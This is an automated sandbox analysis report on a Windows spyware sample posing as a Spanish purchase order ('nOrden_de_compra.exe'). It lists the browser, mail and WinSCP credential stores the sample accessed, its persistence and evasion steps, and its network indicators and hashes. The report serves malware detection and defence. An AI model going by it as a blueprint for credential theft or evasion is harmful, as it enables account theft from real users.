Source: Yara match | File source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nOrden_de_compra.exe PID: 1460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nNdsLvHyWi.exe PID: 1176, type: MEMORYSTR
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.71a0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.71a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.2cde9dc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.7160000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.27de9e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.27de9e8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3ca9970.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.7160000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2146832318.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nOrden_de_compra.exe PID: 1460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nNdsLvHyWi.exe PID: 1176, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nOrden_de_compra.exe PID: 1460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: nNdsLvHyWi.exe PID: 1176, type: MEMORYSTR
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.71a0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.71a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.2cde9dc.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.7160000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.27de9e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.nNdsLvHyWi.exe.27de9e8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.3ca9970.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nOrden_de_compra.exe.7160000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2146832318.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (flattened in extraction; listed below per tactic are the techniques that carry a signature count in the report, with the count as printed in square brackets)

• Execution: Windows Management Instrumentation [121]; Scheduled Task/Job [1]
• Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]
• Privilege Escalation: DLL Side-Loading [1]; Process Injection [111]; Scheduled Task/Job [1]
• Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [22]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [141]; Process Injection [111]
• Credential Access: OS Credential Dumping [1]; Input Capture [21]; Credentials in Registry [1]
• Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Query Registry [1]; Security Software Discovery [211]; Process Discovery [1]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; System Network Configuration Discovery [1]
• Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [1]; Input Capture [21]; Clipboard Data [1]
• Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [23]
• Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no techniques flagged

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID: 1385592; Sample: nOrden_de_compra.exe; Start date: 02/02/2024; Architecture: WINDOWS; Score: 100)

Start node:
• Contacted domains: mail.triorentacar.ro; triorentacar.ro; 2 other IPs or domains
• Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 10 other signatures
• Started processes: nOrden_de_compra.exe; nNdsLvHyWi.exe

nOrden_de_compra.exe (started from the start node):
• Dropped files: C:\Users\user\AppData\...\nNdsLvHyWi.exe (PE32); C:\Users\user\AppData\Local\...\tmpD5F2.tmp (XML)
• Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
• Child processes: nOrden_de_compra.exe; powershell.exe; powershell.exe; 2 other processes

nOrden_de_compra.exe (child process):
• Network: api4.ipify.org 173.231.16.76, 443, 49702, 49706, WEBNXUS, United States; triorentacar.ro 89.32.46.159, 49703, 49707, 49708, WEBCLASSITRO, Romania
• Signatures: Installs a global keyboard hook

powershell.exe (first instance): child processes conhost.exe; WmiPrvSE.exe
powershell.exe (second instance): child process conhost.exe
2 other processes: child process conhost.exe

nNdsLvHyWi.exe (started from the start node):
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
• Child processes: nNdsLvHyWi.exe; schtasks.exe

nNdsLvHyWi.exe (child process):
• Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

schtasks.exe: child process conhost.exe

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
nOrden_de_compra.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook
nOrden_de_compra.exe | 43% | Virustotal |
nOrden_de_compra.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook
C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | 43% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
triorentacar.ro | 0% | Virustotal |
mail.triorentacar.ro | 0% | Virustotal |

Source | Detection | Scanner | Label
http://crl.m | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://mail.triorentacar.ro | 0% | Virustotal |
http://www.microsoft.8 | 0% | Avira URL Cloud | safe
http://mail.triorentacar.ro | 0% | Avira URL Cloud | safe
http://triorentacar.ro | 0% | Avira URL Cloud | safe
http://triorentacar.ro | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api4.ipify.org | 173.231.16.76 | true | false | | high
triorentacar.ro | 89.32.46.159 | true | false | | unknown
api.ipify.org | unknown | unknown | false | | high
mail.triorentacar.ro | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | nOrden_de_compra.exe, 0000000A.00000002.4543063904.00000000068E2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.8 | nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://mail.triorentacar.ro | nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://api.ipify.org/t | nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | nOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2146832318.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://triorentacar.ro | nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
89.32.46.159 | triorentacar.ro | Romania | 34358 | WEBCLASSITRO | false
173.231.16.76 | api4.ipify.org | United States | 18450 | WEBNXUS | false
Joe Sandbox version: 39.0.0 Ruby
Analysis ID: 1385592
Start date and time: 2024-02-02 14:03:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: nOrden_de_compra.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/15@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 223
• Number of non-executed functions: 16
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type              Description
14:03:57  API Interceptor   8896667x Sleep call for process: nOrden_de_compra.exe modified
14:03:58  API Interceptor   26x Sleep call for process: powershell.exe modified
14:03:59  Task Scheduler    Run new task: nNdsLvHyWi path: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
14:04:01  API Interceptor   7418522x Sleep call for process: nNdsLvHyWi.exe modified
Context for IPs
Match           Associated sample name / URL          Detection   Threat name                                        Context
89.32.46.159    Project_Offer_2024.exe                malicious   AgentTesla
                ndHq.exe                              malicious   AgentTesla
173.231.16.76   InstallSetup1.exe                     malicious   Stealc                                             api.ipify.org/?format=dwd
                mhddos_proxy_win.exe                  malicious   Unknown                                            api.ipify.org/?format=text
                Hhwsbefq.exe                          malicious   Targeted Ransomware                                api.ipify.org/
                4cGFnkiRf2.exe                        malicious   Targeted Ransomware                                api.ipify.org/
                Help.File@zohomail.eu_Fast.exe        malicious   TrojanRansom                                       api.ipify.org/
                DHLINV1708023_-_1301512300.exe        malicious   MassLogger RAT, zgRAT                              api.ipify.org/
                Ross.dec1966@gmail.com_Fast.bin.exe   malicious   Babuk, Chaos, Conti, RegretLocker, TrojanRansom    api.ipify.org/
                Imdouqb.bat                           malicious   Unknown                                            api.ipify.org/
                XP5wlJGjng.exe                        malicious   Typhon Logger                                      api.ipify.org/
                file.exe                              malicious   Unknown                                            api.ipify.org/
Context for domains
Match            Associated sample name / URL                                Detection   Threat name                            Context (resolved IP)
api4.ipify.org   INVOICE.exe                                                 malicious   AgentTesla, PureLog Stealer            104.237.62.212
                 sZ3v675Idu.exe                                              malicious   AgentTesla, PureLog Stealer            173.231.16.76
                 0001.pif.exe                                                malicious   AgentTesla, PureLog Stealer            64.185.227.156
                 SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exe          malicious   AgentTesla, PureLog Stealer            64.185.227.156
                 SecuriteInfo.com.Trojan.MulDropNET.68.14731.14018.exe       malicious   AgentTesla, PureLog Stealer            173.231.16.76
                 SOA.exe                                                     malicious   AgentTesla, PureLog Stealer            64.185.227.156
                 SecuriteInfo.com.FileRepMalware.4794.21088.exe              malicious   AgentTesla, PureLog Stealer, RedLine   173.231.16.76
                 OOLU4051770254.scr.exe                                      malicious   AgentTesla, PureLog Stealer            64.185.227.156
                 SecuriteInfo.com.Win32.RATX-gen.28393.22981.exe             malicious   AgentTesla, PureLog Stealer            64.185.227.156
                 SOA_87437924_Payment______________________________PDF.exe   malicious   AgentTesla                             64.185.227.156
Context for ASNs
Match          Associated sample name / URL                                Detection   Threat name                            Context (IP)
WEBNXUS        INVOICE.exe                                                 malicious   AgentTesla, PureLog Stealer            104.237.62.212
               sZ3v675Idu.exe                                              malicious   AgentTesla, PureLog Stealer            173.231.16.76
               0001.pif.exe                                                malicious   AgentTesla, PureLog Stealer            64.185.227.156
               SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exe          malicious   AgentTesla, PureLog Stealer            64.185.227.156
               SecuriteInfo.com.Trojan.MulDropNET.68.14731.14018.exe       malicious   AgentTesla, PureLog Stealer            173.231.16.76
               SOA.exe                                                     malicious   AgentTesla, PureLog Stealer            64.185.227.156
               SecuriteInfo.com.FileRepMalware.4794.21088.exe              malicious   AgentTesla, PureLog Stealer, RedLine   173.231.16.76
               OOLU4051770254.scr.exe                                      malicious   AgentTesla, PureLog Stealer            64.185.227.156
               SecuriteInfo.com.Win32.RATX-gen.28393.22981.exe             malicious   AgentTesla, PureLog Stealer            64.185.227.156
               SOA_87437924_Payment______________________________PDF.exe   malicious   AgentTesla                             64.185.227.156
WEBCLASSITRO   Project_Offer_2024.exe                                      malicious   AgentTesla                             89.32.46.159
               ndHq.exe                                                    malicious   AgentTesla                             89.32.46.159
               arm7-20240101-1250.elf                                      malicious   Mirai                                  37.251.157.173
               MS Document.html                                            malicious   Phisher                                37.251.137.194
               3m37SZRkdC.elf                                              malicious   Mirai                                  37.251.157.145
               meerkat.x86.elf                                             malicious   Mirai                                  37.251.157.141
               1x9SsU5xOL.elf                                              malicious   Mirai                                  37.251.157.133
               73IQC7zT52.elf                                              malicious   Mirai, Moobot                          37.251.157.188
               scYHPiyZLt.elf                                              malicious   Mirai                                  37.251.175.20
               QQlbAyRysQ.elf                                              malicious   Mirai                                  37.251.175.25
Context for JA3 fingerprint
Match                              Associated sample name / URL                                Detection   Threat name                   Context (IP)
3b5074b1b5d032e5620f69f9f700ff0e   http://scsksa.com                                           malicious   Unknown                       173.231.16.76
                                   INVOICE.exe                                                 malicious   AgentTesla, PureLog Stealer   173.231.16.76
                                   SecuriteInfo.com.Trojan.DownloaderNET.74.18381.3316.exe     malicious   Unknown                       173.231.16.76
                                   SecuriteInfo.com.Trojan.DownloaderNET.74.18381.3316.exe     malicious   Unknown                       173.231.16.76
                                   http://www.infobellit.com                                   malicious   Unknown                       173.231.16.76
                                   sZ3v675Idu.exe                                              malicious   AgentTesla, PureLog Stealer   173.231.16.76
                                   Document.pdf.lnk                                            malicious   Unknown                       173.231.16.76
                                   https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b,8d23fb3,492093b&p1=energuapi%E3%80%82com/reesscw/cwsssw/dGhvcnN0ZW4uc2NobmVpZGV3aW5kQG9yaW9uLmNo#   malicious   HTMLPhisher   173.231.16.76
                                   0001.pif.exe                                                malicious   AgentTesla, PureLog Stealer   173.231.16.76
                                   Cqqjbi.exe                                                  malicious   Unknown                       173.231.16.76
                                        No context
Process: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1415
Entropy (8bit): 5.352427679901606
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
MD5: 3978978DE913FD1C068312697D6E5917
SHA1: 1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
SHA-256: 33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
SHA-512: 78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
Malicious: false
Reputation: moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"
Process: C:\Users\user\Desktop\nOrden_de_compra.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1415
Entropy (8bit): 5.352427679901606
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
MD5: 3978978DE913FD1C068312697D6E5917
SHA1: 1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
SHA-256: 33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
SHA-512: 78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
Malicious: false
